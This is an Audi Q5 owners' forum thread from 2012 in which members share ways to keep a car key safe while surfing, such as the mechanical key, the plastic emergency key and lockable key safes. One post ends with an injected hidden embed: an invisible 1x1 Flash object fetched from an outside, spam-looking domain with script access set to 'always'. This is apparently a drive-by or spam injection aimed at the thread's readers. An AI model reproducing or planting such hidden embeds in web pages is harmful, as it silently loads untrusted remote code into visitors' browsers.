Q5/SQ5 MKI (8R) Discussion Discussion forum for the First Generation Audi Q5 SUV produced from 2008 to 2017

Recommended key safety ideas for surfer?

Search this Thread

Old 06-19-2012, 11:40 AM
Audiworld Junior Member

Received 0 Likes on 0 Posts
Default Recommended key safety ideas for surfer?

Was wondering if there are any surfers out there that have key recommendations? As far as I know the electronic key is not waterproof, so was wondering what safety recommendations you had as opposed to just leaving a beachbag on the sand alone?
Old 06-19-2012, 12:07 PM
Audiworld Junior Member

I was told by my sales guy (who was quite knowledgeable about the Q5) that the mechanical key, whose housing unit is in the glove compartment, is what typically gets used as the "beach key".

I have not paid much attention to it, but if I recall correctly from reading the manual, you can take apart your key fob to reveal the mechanical key, insert that into the plastic housing and it becomes the valet key.

I think you can also just take the mechanical key and use it to lock/unlock the door. The plastic housing is only needed to insert the thing into the key slot in order to start the car.

-alex

Originally Posted by QueensGambit
Was wondering if there are any surfers out there that have key recommendations? As far as I know the electronic key is not waterproof, so was wondering what safety recommendations you had as opposed to just leaving a beachbag on the sand alone?
Old 06-19-2012, 01:07 PM
AudiWorld Member

Originally Posted by rent
I think you can also just take the mechanical key and use it to lock/unlock the door. The plastic housing is only needed to insert the thing into the key slot in order to start the car.

-alex
This. Just release the metal part of the key from the electronics, and leave the rest in the center console.

Your other option would be to buy a "key safe" that is basically a combination lock with a compartment inside for your key. You can hook the lock around something metal (maybe underneath the car?) to keep somone from walking off with it. I see these marketed to surfers all the time.
Old 06-19-2012, 01:13 PM
AudiWorld Member

Received 2 Likes on 2 Posts

The key that goes with the holder in the glove box is a separate key, it is made of plastic, and is waterproof. It is referred to as the "emergency key." It is also easily broken because it is plastic. Attached are some photos of it.
Attached Images   
Old 06-19-2012, 05:03 PM
AudiWorld Senior Member

Received 3 Likes on 3 Posts

i usually take the metal key out of the remote, leave the remote in the car, then manually lock the door using the key and drivers side keyhole. that locks the car so that you need to use the manual key to open it, even if you have the advanced key, this works. then just leave the manual key in your pocket, go in the water with it. good to go!
Old 06-19-2012, 05:46 PM
AudiWorld Member

I also use the plastic "emergency key." Fits well on a key chain and you can splash it in the salt water all day without any corrosion. Works great.
Old 06-24-2012, 03:48 PM
Audiworld Junior Member

same here, I use the small plastic 'wallet/emergency' key and just keep it on the loop in my wetsuit or surftrunks.
use the FOB to lock your car as usual (I do this when the trunk is still open), leave the keys in the trunk and close it. the car is now locked and on alarm (I think, at least outs locked and beeps).
after surfing, just use the small plastic key to open the front door, pop the trunk and you're set.
after one sesh I forgot to put the small key back in my wallet, and probably lost if when I drove off and it fell of my rear bumper.
I ended up buying two new ones; one for the wallet, and one I keep on my keychain as dedicated surf-key.
works flawless!!
Old 06-25-2012, 07:00 AM
Audiworld Junior Member

Well, maybe you can keep the key in one of those waterproof containers that you keep around your neck on a piece of string.
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://ihavejustbeenpaid.info/flash/7/1x1.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://ihavejustbeenpaid.info/flash/7/1x1.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Old 06-25-2012, 09:54 AM
AudiWorld Member

Received 17 Likes on 16 Posts

Don't surf where there are sharks !